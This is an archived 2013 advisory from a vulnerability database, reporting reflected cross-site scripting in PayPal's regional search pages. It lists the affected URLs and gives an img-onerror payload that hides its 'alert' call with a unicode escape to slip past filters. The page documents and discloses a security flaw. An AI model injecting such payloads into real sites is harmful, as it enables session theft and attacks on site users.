Paypal Multiple Cross Site Scripting

2013.05.28
Risk: Low
Local: No
Remote: Yes
CVE: N/A
CWE: CWE-79

+++++++++++++++++++++++ # Exploit Title : PAYPAL CROSS SITE SCRIPTING # *Vendor*: https://www.paypal.com # Author: Juan Carlos Garca (secnight) # Blog: http://hackingmadrid.blogspot.com http://www.highsec.es http://blog.0verl0ad.com http://blog.0verl0ad.com/ http://www.facebook.com/pages/ETHICAL-HACKING-Y-OL%C3%89-by-the-Face-WhiteHat/172393869485449?sk=app_190322544333196 BREIF DESCRIPTION ++++++++++++++++++++++++++ PayPal is a global e-commerce business allowing payments and money transfers to be made through the Internet. Online money transfers serve as electronic alternatives to paying with traditional paper methods, such as checks and money orders. PayPal is an acquirer, performing payment processing for online vendors, auction sites, and other commercial users, for which it charges a fee. It may also charge a fee for receiving money, proportional to the amount received. The fees depend on the currency used, the payment option used, the country of the sender, the country of the recipient, the amount sent and the recipient's account type.[4] In addition, eBay purchases made by credit card through PayPal may incur extra fees if the buyer and seller use different currencies. ++++++++++++++++++++++ Proof Of Concept ++++++++++++ https://www.paypal.com/ch/cgi-bin/searchscr?cmd=_sitewide-search https://www.paypal.com/au/cgi-bin/searchscr?cmd=_sitewide-search https://www.paypal.com/nl/cgi-bin/searchscr?cmd=_sitewide-search https://www.paypal.com/be/cgi-bin/searchscr?cmd=_sitewide-search https://www.paypal.com/jp/cgi-bin/searchscr?cmd=_sitewide-search https://www.paypal.com/cn/cgi-bin/searchscr?cmd=_sitewide-search https://www.paypal.com/fr/cgi-bin/searchscr?cmd=_sitewide-search https://www.paypal.com/de/cgi-bin/searchscr?cmd=_sitewide-search https://www.paypal.com/ie/cgi-bin/searchscr?cmd=_sitewide-search https://www.paypal.com/ca/cgi-bin/searchscr?cmd=_sitewide-search https://www.paypal.com/es/cgi-bin/searchscr?cmd=_sitewide-search https://www.paypal.com/uk/cgi-bin/searchscr?cmd=_sitewide-search https://www.paypal.com/pl/cgi-bin/webscr?cmd=_sitewide-search XSS Payload: <img src="x:gif" onerror="window['al\u0065rt'](/XSS Juan Carlos Garcia/)"></img>

References:

http://www.highsec.es
http://www.facebook.com/pages/ETHICAL-HACKING-Y-OL%C3%89-by-the-Face-WhiteHat/172393869485449?sk=app_190322544333196


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2024, cxsecurity.com

 

Back to Top